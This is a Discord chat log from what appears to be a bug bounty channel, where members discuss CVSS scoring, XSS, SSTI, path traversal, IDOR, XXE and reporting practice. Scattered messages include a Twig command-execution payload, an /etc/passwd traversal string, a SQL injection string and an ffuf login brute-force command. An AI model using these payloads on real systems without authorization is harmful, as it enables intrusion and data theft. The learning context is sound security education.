[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 [200]: (null) /script.js
[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 Closing
so I am not getting the cookie for some reason
yea, you're doing too much
Trying to calculate a CVSS score for stored XSS, not too sure specifically what to put for the CIA, because it would all depend on the JS that is being executed
Have you used the CVSS score calculator?
If it requires setup then you say yes, it will decrease the score
That's what I'm using at the moment
But I'm wondering what to put at the CIA part
Because it'd obviously depend on the JS that's used in the stored XSS
You’re assessing what it can be used to do, not what you’re making it do
yeah idk, I've tried all sorts, I'm definitely missing something, I just don't know what
Have you done the CVSS course that they offer? It's free and takes minutes
Nope, which CVSS calculator?
Direct from FIRST
No the CVSS scoring one
This?
Okay, so with stored XSS, the attack can be injected by the attacker without any interaction from the user, but obviously the user would have to be on the page with the vulnerable component, so in that case it would require UI, correct?
okay, thankfully there's an example in there for stored XSS
I don't understand why it's so low though:
Confidentiality: you could execute malicious JS to send cookies and customer data in context
Integrity: you could modify the page's HTML
Availability: Again, by modifying the page's HTML you're making the required resource not available
I think availability is referring to whether something like DoS is possible, essentially whether it's possible to make the user exit out of the website (clicking the x) before it does its thing. I do think modifying it to the extent of making a service not available may be possible, but it definitely depends on context
That's why you have to calculate the CVSS score for each vulnerability, it's on a case by case basis
I believe action refers to whether the user has to click a link, for example. Does the user have to actively participate for the exploit to work? Does the exploit work if the user is using the website normally?
you are right - part of the definition of 'availability' is uptime. If an attack breaks the resource and makes it inaccessible, it would raise the score for availability
But technically, modifying the page's HTML to something different makes the original source inaccessible, no?
Maybe? Again it's on a case by case basis
What's the stored xss in question? What does it affect? Could you feasibly cause any inaccessibility?
From my experience, stored XSS isn't a big issue by itself (it's usually medium severity). What is a problem is if it's chained with something like a bad password change functionality (say, if you don't need to put in your current password). You can create an account takeover like that, by sending a POST request to that endpoint, and that's a critical vulnerability
But by itself it isn't a huge deal, and we've had people disregard it entirely during pentests. (as in, they don't fix it) That's why it's always important to try to escalate it, because the higher severity the vulnerability (the more you prove that the vulnerability is actually a big deal), the more likely the client is to fix it
huh
guys, I have discovered SSTI (Twig). When I give this payload: {{7*7}} it shows 49, but when I give this kind of payload: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} it gives blank output. What should I do now?
I have even tried all the payloads from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md#twig---code-execution but it still shows blank for all of them
I recommend for you to do this on your local machine and try to recreate the scenario
@young spoke same dude
Hi. I want to try out doing bug bounties but I don't know where to start. I want to have some small successes with small rewards. Is there something like this? This would also be the first real-world thing I would do, and I would also do this as some sort of side hustle because I'm still in school. Also, is this too early to do bug bounties and should I continue expanding my skillset, or can I start doing low-level bug bounties?
Learn first before applying anything.
any tips on getting started? (ik this is a vague question)
for some reason, when I put in a payload the website returns a 403 Forbidden. Is there something I should do?
read the pins 🙂
Thanks
That's not nearly enough info to help you, the kind of payload will be a useful start
and it doesn't work?
is it supposed to be vulnerable to that or are you just trying it
then its not vulnerable 😛
For that specific payload. But yeah probably not at all
yeah but my question is why does it return a 403
and should I try different payloads?
That depends on the web server
It could be that the web server is interpreting this as a nonexistent page then auto defaults to 403
nginx
or it could be returning 403 since there are invalid characters in the parameter it's checking
if it's nonexistent shouldn't it be a 404?
That depends on how it is coded 🙂
You could, like Mkunkn said, you might be getting a nonexistent page, and a different path might work, it may also be because of invalid characters, which a different payload might not use. There's not much harm in running a bunch of payloads using burp intruder.
ok I'll try doing that 
just the way the webserver is coded
and you realize you're not actually accessing the system files here? You're basically saying https://website.com/etc/passwd; if etc/passwd isn't a file or directory in the content the webserver is serving, then it's gonna error
LFI usually involves something like index.php?file=xyz, because it's being executed with PHP, which then accesses the server's files; that's how it gets them
say the input isn't sanitized, then you can use ?file=../../../../../../etc/passwd
LFI and traversal are worth considering separately
true, but it usually has to involve a file parameter that it takes, you can't have something like https://webapp.thm/../../etc/passwd as that'll just take you to https://webapp.thm/etc/passwd
~~You can, just not using a browser as that'll work against you, see examples here https://owasp.org/www-community/attacks/Path_Traversal~~
It happens a lot more rarely, outside of things like embedded devices or custom webservers
So you can get it without having the webserver use a file handling script? (like index.php?file=xyz) I don't see how?
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored ***outside the web root folder.***
Yes, please scroll down to the examples.
It requires an exceptionally poorly programmed webserver
https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/goahead_traversal.rb
From a very cursory read, this looks to be an example?
https://www.exploit-db.com/exploits/21607 Yeah it is @fast fable
Sorry, totally skimmed over that example
But yeah, the webserver must be a pretty terrible one
Well, not a widely used one typically. Hence embedded devices.
But here's a quite recent example, in a widely used webserver: https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
Yikes
Interesting how you need to encode it
To prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as %2e, the logic fails to recognize %2e as dot thereby not decoding it, this converts the characters ../ to .%2e/ and bypasses the check.
ty for the read
Gave +1 Rep to @vocal folio
let's say this XSS payload works: '>><marquee><h1>XSS</h1></marquee> is that good enough to report or do I have to make an alert show
that doesn't show actual scripting, just adding elements - I'd make sure to show a working POC that demonstrates possible impact
but the payload works like the text is actually moving
oh ok
This is not XSS. This is HTML Injection
ohh ok
should I report it?
there’s no impact but I’m trying hard to find something
if you can tell me something that I should do to create impact tell me
Hi all, I am new to cybersecurity and I want to learning Bug bounty. Please suggest how and where to start.
well going through the #web-fundamentals-path on https://tryhackme.com/ is a good start in shadows opinion
Check the pinned messages in this channel
I have completed this path, at current I am in JR PT path in tryhackme.
Have you done JR PT path?
Currently in it. Last few sections left.
https://help.tryhackme.com/miscellaneous/the-bug-bounty-programme link is broken :\
is there an alternative?
Responsibly discovering & disclosing security flaws!
Thank you @fast fable :D
Gave +1 Rep to @fast fable
it would be nice to have this link updated on the pinned messages
sure, cc @young spoke
This is the pinned message :)
#bug-bounty message
@paper flint
see #bug-bounty message
what's a self xss?
it's when the victim unknowingly runs the code themselves in the browser
You know when you get all the warnings opening up the console? It's to prevent self-XSS
self-xss cannot be triggered in normal ways via a crafted URL or a cross-domain request
Instead, the vulnerability is only triggered if the victim themselves submits the XSS payload from their browser. Delivering a self-XSS attack normally involves socially engineering the victim to paste some attacker-supplied input into their browser. As such, it is normally considered to be a lame, low-impact issue.
its mostly social engineering
ahhh so I reported the XSS, they were aware of the actual XSS but my initial vector was actually different so I got a bounty for that, which was nice of them
where do you hunt Jayy
wdym?
Slay
I don't actively look for bug bounties (like using HackerOne etc.), it's mostly just me browsing, doing work or something, and if I see something that looks like it could potentially cause issues, I'll check if the site has a bug bounty and if they do, then a bit of digging for around an hour or so - then depending on whether I get anything interesting, I'll continue to dig for a couple more hours
That seems like a good approach
ah, i thought you actively hunt on platforms
oh nah, I don't have enough time for that
yeah, it works really well for me
and I'll only continue to look if I get unexpected / not intended output (I don't really bother with blind injection and those sorts)
otherwise I don't bother wasting hours on it
Honestly a lot of regular bug bounty is just fuzzing
This feels like a better way to not spend too much time while also learning
When I'm allowed to, I'll disclose the ones I've found and my thought process, which hopefully will be of use to someone
fwiw I got an extra $50 for a detailed report, so always good to do that!
Do you have format for your pentest report?
I thought it requires a template to report your findings
Nope 🤷♂️
that’s really only for execs
and I assume the company will write up their own shit once people have reported findings
in order to report to their own execs
but the technical guys, they don’t give a shit, they just want the details
😂🤣gotcha
Me fighting the urge to combine my head with a brick every time I hear that word
cool
Go for it queen🫳
How's that going for you
Oh no 😂😂
Im losing my mind
That's terrible
Cool
Hi
I would like to know in which language this was encoded
${/|_/|////_|/|\} = $ [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YwBtAGQA’)))
Does anyone know which type of encryption it was and how to decode it?
what does this mean
Content spoofing and text injection issues without showing an attack vector/without being able to modify HTML/CSS
the b64 is cmd
Ya tq
What do you mean?
It means when you aren't able to show an attack vector that leads to plausible defacement of a website
hello
in order to get started in bug bounty, what paths should I complete in TryHackMe?
Hi, Web Fundamentals. Also check the pinned message
cannot solve authentication bypass Task 3
I am running the given command but still cannot get the username and password
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.26.116/customers/login -fc 200
The given command
Can you send a screenshot
plus, this sounds like something for #room-help , i'd ask you to send it there so others can also view
More visibility 🙂
@analog glen
Are vulnerability reports generated by Burp Suite Professional accepted or not??
No, manual validation is required
ok
no
So can you seriously get a decent income just hunting using scanners?
Seems like if you can detect a bug using automated scanners it should have already been patched
No
And in most cases, using automated scanners is out of scope
in a job yeah, in bug bounties no
There is still manual validation 🙂
plus a lot of results from automated scans (missing HTTP headers, etc.) are not accepted as bugs 🙂
Yeah, that bit makes sense
also what Jayy said. Running automated scanners isn't allowed most of the time, and in some cases where they are allowed, they are abysmally throttled (1 req/sec), so that affects scan times
So this program for example, doesn't have any limitations, but you need to manually perform the exploit?
It does have limitations, wdym?
On automated scanners I mean?
Or do I just not see it?
Right, but that just means you need to manually perform the exploit
That's the confirmation it's referring to
"Interruption or degradation of our service"
Right, but I'd think it can still handle a decent pace before you start hitting DOS levels?
does anyone make a living from this?
people do yeah
Can anyone recommend a program which I should start as a beginner
So that I could be a bit safe side
I presume that some(or many) people(in this field) work in the job and do bugbounty as their private or side projects.
Some do. Bug bounty isn't a reliable income stream but it might be worthwhile if you want to have some experience hacking within the bounds of a particular program and producing reports
Other people do CTFs, study for certs or do all kinds of other projects/hobbies related, or not, to hacking
Can anyone help with this
What do you mean by a program
Like a bug bounty program?
yes
I am looking at VDPs in Bugcrowd but can't decide which one I should go with
There are no "easy" VDPs, heck I don't even consider difficulty when it comes to bug bounty programs.
Don't think of them as training grounds. These are real companies, with real infrastructure, serving real users
Coming into this with a beginner background would just end up working against you
I suggest you try and solidify your knowledge and skills first
I would suggest doing the Hacker101 CTFs , the PortSwigger Academy training and plenty of machines in THM/HTB/VulnHub and other playgrounds. Perhaps spend time on PicoCTF and build your confidence. Perhaps check out the HTB CBBH cert and build your skills
Yeah I am doing learning path in THM at current I am in OPT (Offensive Pentesting) and completed Web fundamentals, JPT
Hi
I want to start bug bounty how should I start ?
I want to learn in an ethical way
#site-support I want to start bug bounty how should I start ?
Read the pins
?
@opaque relic
Is anyone from india going to defcon this year...?!
Whoops, wrong channel
everyone in the community says we need a mentor, so is there anyone here who can mentor me to find my first bug? I promise that I will follow every step you tell me. thanks in advance!
I'd like to ask about the most common vulnerabilities that are found in web applications?
Ok thx
Gave +1 Rep to @fast fable
Where do you guys mostly find vulns, outside or inside the app or site?
How can I (Account-Take-Over) any Account ? (2) https://medium.com/@ozomarzu/how-can-i-account-take-over-any-account-2-9533d54bc33e
@vocal folio
hi guys, I have a problem when I want to connect to OpenVPN to solve a machine on TryHackMe. Here is the error, please help
2023-05-26 00:18:51 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
!vpnscript
Run this and see if it fixes your problem
@mint maple This channel is for bug bounty hunting
@opaque relic
They've done this over 4 times now and I've tagged multiple mods, with no action taken so I presume it's okay 🤷♂️
seems fair
will stop tagging mods now
Please don’t excessively self promote @trim narwhal
Posting your write ups is fine but actually interact with the community
Hello
Anyone online
If I can upload an image and the filename format is /etc/new.jpg, is it a vulnerability to report while conducting a pentest?
Not without further testing
If you can prove that it was written outside the web directory, it is a vuln
It might also just be saved as \/etc\/new.jpg, so the special chars are being escaped
I'd say it could probably be written up as a vuln, let's say improperly sanitized input, but it would be classified as P4 or P5 without further testing
just to add, before you submit a vuln always think about what the impact of your finding is
Start with VDP programs
like
ford.com
https://hackerone.com/ford?type=team
what should someone do if they get an error from a parser when testing for xxe?
is that a sign for xxe?
@lavish hollow
@trim narwhal has been warned.
tbf the username checks out 😂
fr 
I'm curious, how do you protect yourself legally when doing bug bounties? One's ISP might look at attacks as such, first thought is using a vpn or a vps
If you don't follow the guidelines and scopes in a bug bounty program and you take harmful actions against the company, you are engaging in criminal activity. Therefore, since that is the primary goal of bug bounty, you do not need to hide yourself. You will be fine with your ISP as long as you don't make a lot of traffic while scanning
You should speak to your ISP, it is against their terms of use in some cases
Now I doubt whether they meant their ISP or someone's ISP (Company?)
From the context, it sounds like they are referring to their own
Hey guys! Is there a channel to make announcement of bug bounties?
Can it be done here?
What do you mean?
people who are doing BB's - are you flying solo or in a group?
solo all the way 😎
let's say if it's an undefined entity, what should someone do?
have you googled to see what "undefined entity" means?
yes @quartz aspen
if someone used an XXE payload via file upload and it works, should I report it?
is this a bounty platform? if yes, then maybe someone else tested, if no, then yea.
@serene mural Wrong Discord.
can someone give me a good app to screen record for pocs on windows
Hi there, I'm getting an incorrect error for this question even though the answer is right.
Referring to the technique from question 2, what mitigation method suggests using SMS messages as an alternative for its implementation?
Mitre Room 8
the answer is abnormal or malicious behavior but it doesn't work.
Hi, for help related to rooms, #room-help
thanks
Instead of Reporting - No Rate Limit -
On any Email endpoint and getting it closed as Informative / N/A
You can Try this and can create Impact but make sure to not actually harm their service:
If you ever find a No Rate Limit on any Email Endpoint, Instead of reporting it and getting it closed as Informative. 🤓
🥷 Try this 🥷
Check if the WebApp is using Amazon SES as their Email Service & if they are Following Proper Email RFC (5322)
👇
what is hard-coding?
Have you entered this question into Google?
yeah but I didn't really quite understand so that's why I came here
Ok, so what did you find and what didn't you understand?
Make it clear you've done your research by asking questions beyond what you'd google
usually, i'm gonna assume because you're asking in a bug bounty discord, hard coding is when credentials are hard coded into code, and either referenced by the code itself or developers making/using the code. obviously it poses a risk because if someone finds the code, they get the credentials
"Tasty Cookies 🍪": Cookies with a Security Lens 🔎
I've compiled a comprehensive resource on cookies. If you're interested in diving deep into the intricacies of cookie security, this is for you! I've covered everything from edge cases to same-site attributes, CORS, and even practical scenarios. 🌐🔒
Access the research here: https://twitter.com/shubham_srt/status/1666694068439744512
Feel free to explore, learn, and share your thoughts. Also please DM in case of any Suggestions/Addition/Corrections you wish to offer.
Hey
I am new to bug bounty. Can anyone help me out to properly begin with
Read pinned messages
how does one avoid getting duplicates?
one gets lucky
but you can only have so much luck
¯\_(ツ)_/¯
it's impossible, but you could get fewer duplicates if you search for more unknown vulnerabilities; it all depends on luck
Hii
I am getting this, can someone help me in this?
getting what? sorry can you explain 🙂
[!] This exploit may require manual cleanup of '%TEMP%\ZvrZcaR.vbs' on the target
It's okay..
if you had posted this earlier i wouldn't have responded
actually I was trying to upload an image, but the option was not there, so copied it.
Ah got it! Wish i had an answer for you! I didn't know what it was that you needed help with so thought i'd ask
sorry for wasting time
!docs verify
hey
don't go hunting for P4s, just check for them when its easy. and get deep into the application
I agree with what other people said about needing luck, but choosing a program with a quick resolution time and looking for high-impact bugs that would have been resolved faster can help
is chaining bugs also a good idea?
chaining bugs is OP, especially stored XSS + CSRF. it can take you from a low-end P2 payout to a high-end P2 payout or even P1 if you're lucky
thanks for the tip
Gave +1 Rep to @quick berry
can anyone explain to me what chaining bugs is? I'm new
Finding separate issues and combining them to get more impact than each individually
interesting thx
Gave +1 Rep to @vocal folio
I've been doing CTFs for a while now and I'm looking to get into bug bounties. I was wondering what vulnerability is best to focus on first?
IDOR
Sup y'all, I've currently got 3 UUID-based IDORs I'm debating on submitting
one of them is pretty severe, definitely P2, if it weren't a UUID.
anyone got any experience submitting UUID-based IDORs?
i've tried pretty hard to find ways to expose the uuids one way or another, any advice at all is appreciated.
You've tried figuring out whether you can get a user's UUID from an API request?
can't really do anything else 🤷♂️
depending on the UUID type, you could maybe get the timestamp from when the account was created
@fast fable i like the last tip. doesn't work for me in my current scenario but it's something to store in the brain vault. I'm gonna hunt for different avenues of leaking the UUIDs for a few more hours. I'm up to 4 IDORs at this point, so if I can leak a few that'd be ideal. If not I may have to settle for P4
yeah, it'd really depend on the type of UUID, if you could possibly reverse engineer how it gets generated...
uuid what’s that?
thanks @fast fable
Gave +1 Rep to @fast fable
looks like this ff76f864-b18c-47ef-8c01-56bf972f48b9, often times organizations implement them so potential IDORS are harder to exploit
but how did u find an idor through that?
Well say that UUID was of a user, and you had an API call
/api/userInfo?userID=uuid
That contained sensitive information
If you changed the UUID to one that was somebody else's, and the API didn't have proper access control, you could get the data of the user with that UUID
no I mean like how did u find a valid UUID when it looks like that
ff76f864b18c-47ef-8c01-56bf972f48b9
He has his own uuid
They're quite random. A little bit is predictable depending on version, but randomness is part of how they achieve universally unique
You're unlikely to fuzz them for example
like @shadow matrix said, I had a secondary account
yep ik thanks for explaining guys 👍
in a POST request, if the "content-type: application/x-www-form-urlencoded" that means the input value is encoded, right? then if I check for SQL vulnerabilities, does that affect it? if I enter " admin' or 1=1 -- " does that go to the backend like this " admin%27+or+1%3D1+-- " or is it only on the client side? if the encoded input goes to the backend, then how do I bypass or mitigate it and perform a further successful injection? even reading material will be helpful. thanks.
On client side you’d type in normally, but if you send the request via curl or edit it in burp you have to make sure it is encoded
It’s just for transmission so there’s nothing you need to bypass, the server will automatically change the encoded form back to the original and work with that
Not trying to spam news articles on multiple channels but i thought this would be appropriate for this channel
I'm looking to start bug hunting this week. I was wondering how you know when you have enough proof for a vulnerability? Like for example, if I get a site to return the version of SQL through injection, is that enough? Or do I need to actually enumerate the databases until I find sensitive data?
How do you know when to stop?
A proof of concept is enough
you wanna team up? i am a noob in cybersec but want to get my hands dirty in bug bounty to at least attempt something practical and real world
When you can demonstrate impact while also not actually showing how to retrieve too-sensitive data.
Hey, I've gotten an exposed .git folder(downloaded with approval) and wondered if there is anything to make the digging more efficient, currently manually inspecting files and grep-ping
@Avi if you have not used it yet, Gitleaks is a good tool for checking past commits for any possible leaks within git repositories.
saves having to go through each commit in the log manually
I knew I heard about something like this, this is the git I wanted, thanks!
Gave +1 Rep to @frozen bane
getting lots of
ERR fatal: bad object refs/heads/main and other files when I moved it to somewhere else
what's your guys' favourite bug? also how long did it take you to find your first?
I want to enter the bug bounty scene soon (1-2 months), currently doing all the PortSwigger Academy labs for their BSCP cert, and then will do some CTFs (including the h1 CTF). Any tips for when I get started? I'm a bit anxious that I will enter it and spend hours upon hours and not find anything or progress at all.
Be prepared to spend hours not finding anything
But, doesn't hurt to try - go for it, use it as a learning experience
just try your best, and if you find a bug it might be a duplicate but that's fine
do VDPs when you start doing real bugs. There's little to no competition and you'll gain enough skill to get actual bounties.
Where’s the best place to learn about idors?
not so much a bug bounty, more of just a bug and me goofing a bit, but;
This was before I really got into tech, but I was able to find an unprotected directory traversal in Star Citizen's website and downloaded a few prototype VOIP binaries they were testing and ran them locally. They were clearly broken and needed more components to run, but the staff member I got in contact with was VERY thankful that I told them after I found it. Was pretty neat and got a few goodies account related.
can we search for a string in any directory with gobuster?
I mean if we want to search for " xyz " but we don't know in which directory it could be
What you want is a recursive search
!rank
can some body help me = > linux/local/exim4_deliver_message_priv_esc: session error
is bash scripting important in bug bounty?
Bash scripting is important to save you the headache of memorizing every single command that you execute on every machine. With not too much effort, you will be able to automate a lot of your work flow. I wouldn't focus on it at first though, because you should get familiar with the commands first and bash scripting will come much easier later when you know what you are trying to script.
bug bounty is mostly web app, so I wouldn't say so.
anyone know like almost a resource for reading or watching bug bounty writeups, and just seeing how different bug bounty submissions went from initial scoping to finding the bug?
different from hackerone hacktivity.
With a Foreword written by HackerOne Co-Founders Michiel Prins and Jobert Abma, Web Hacking 101 is about the ethical disquisition of software for security issues, but learning to hack is not always easy. With many exceptions, being books are exorbitantly specialized, only devote a single chapter to...
This book (which is affiliated with h1) contains a ton of actual vulnerabilities submitted and the thought process behind them, if that's what you are looking for?
yes exactly, like I wanna know what tools were used, what made them think it would be vulnerable to X, why they chose the specific payload or whatever it was and what they looked for.
the book's free
Only on Kindle Unlimited it's free
Actually you can get it for free from hacker one
Has anybody here ever found & claimed a bug bounty reward?
yes
Would you mind if I DMed you
I'd prefer for you to ask your question here
Ah
Okay
When it comes to receiving payment (if there is one), can you choose the method to receive said payment?
You'd have to ask the specific company you're reporting to
Alright, thanks